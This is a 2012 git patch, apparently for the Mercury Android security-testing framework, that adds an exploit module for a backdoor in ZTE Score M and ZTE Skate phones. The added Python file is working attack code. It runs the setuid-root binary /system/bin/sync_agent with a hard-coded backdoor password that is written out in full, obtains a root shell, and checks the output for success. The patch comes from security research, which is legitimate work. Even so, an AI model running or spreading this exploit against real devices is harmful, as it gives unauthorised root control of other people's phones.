From 3ae58560c71d8396c2c7fb7e939afd466596463f Mon Sep 17 00:00:00 2001 From: Tyrone Erasmus Date: Sun, 20 May 2012 15:32:19 +0200 Subject: [PATCH] Added ZTE backdoor exploit --- client/merc/modules/exploit/root/__init__.py | 0 .../merc/modules/exploit/root/ztebackdoor.py | 24 +++++++++++++++++++ 2 files changed, 24 insertions(+) create mode 100644 client/merc/modules/exploit/root/__init__.py create mode 100644 client/merc/modules/exploit/root/ztebackdoor.py diff --git a/client/merc/modules/exploit/root/__init__.py b/client/merc/modules/exploit/root/__init__.py new file mode 100644 index 00000000..e69de29b diff --git a/client/merc/modules/exploit/root/ztebackdoor.py b/client/merc/modules/exploit/root/ztebackdoor.py new file mode 100644 index 00000000..7cfa57b5 --- /dev/null +++ b/client/merc/modules/exploit/root/ztebackdoor.py @@ -0,0 +1,24 @@ +from merc.lib.modules import Module + +class ztebackdoor(Module): + """Description: There is a setuid-root application at /system/bin/sync_agent that serves no function besides providing a root shell on the device. This module runs the affected binary with the hard-coded password to get a root shell. +Affected devices: ZTE Score M and ZTE Skate +Credit: Anonymous - http://pastebin.com/wamYsqTV +Coded by: Tyrone Erasmus - MWR Labs""" + + def __init__(self, *args, **kwargs): + Module.__init__(self, *args, **kwargs) + self.path = ["exploit", "root"] + + def execute(self, session, _arg): + + session.executeCommand("shell", "executeMercuryShell", {'args':'sync_agent ztex1609523'}) + print "\n----------------------------" + returned = session.executeCommand("shell", "readMercuryShell", None).getPaddedErrorOrData() + print returned + print "---------------------------\n" + + if "#" in returned: + print "Success! There is a root shell waiting in shell->persistent\n" + else: + print "It appears that this did not work :(\n" \ No newline at end of file